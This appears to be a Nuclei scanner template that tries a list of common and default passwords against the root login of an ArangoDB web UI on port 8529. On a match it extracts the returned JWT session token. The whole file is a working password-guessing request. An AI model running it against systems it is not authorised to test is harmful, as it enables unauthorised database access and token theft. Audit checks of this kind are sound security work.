id: default-passwords-arangodb

info:
  name: Default/Weak Passwords Check- ArangoDB Web UI
  author: aravazhimdr
  severity: high
  tags: arangodb,database,default-login
  description: Default/Weak Passwords Check - ArangoDB Web UI.
  #Port - 8529 

requests:
  - payloads:
      arangodb_password:
        - "openSesame"
        - "admin"
        - "root"
        - "toor"
        - "password"
        - "password1"
        - "Password"
        - "Password@123"
        - "password@123"
        - "Password@1234"
        - "Password@123!"
        - "12345678"
        - "123456789"
        - "0987654321"
        - "111111"
        - "123123"
        - "12345"
        - "1234567"
        - "qwerty"
        - "abc123"
        - "iloveyou"

    threads: 10
    attack: batteringram
    raw:
      - |
        POST /_db/_system/_open/auth HTTP/1.1
        Host: {{Hostname}}:8529
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Referer: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Connection: close

        {"username":"root","password":"§arangodb_password§"}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/json"
        part: header
      - type: word
        words:
          - "jwt"
          
    extractors:
      - type: regex
        part: body
        regex:
          - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}'
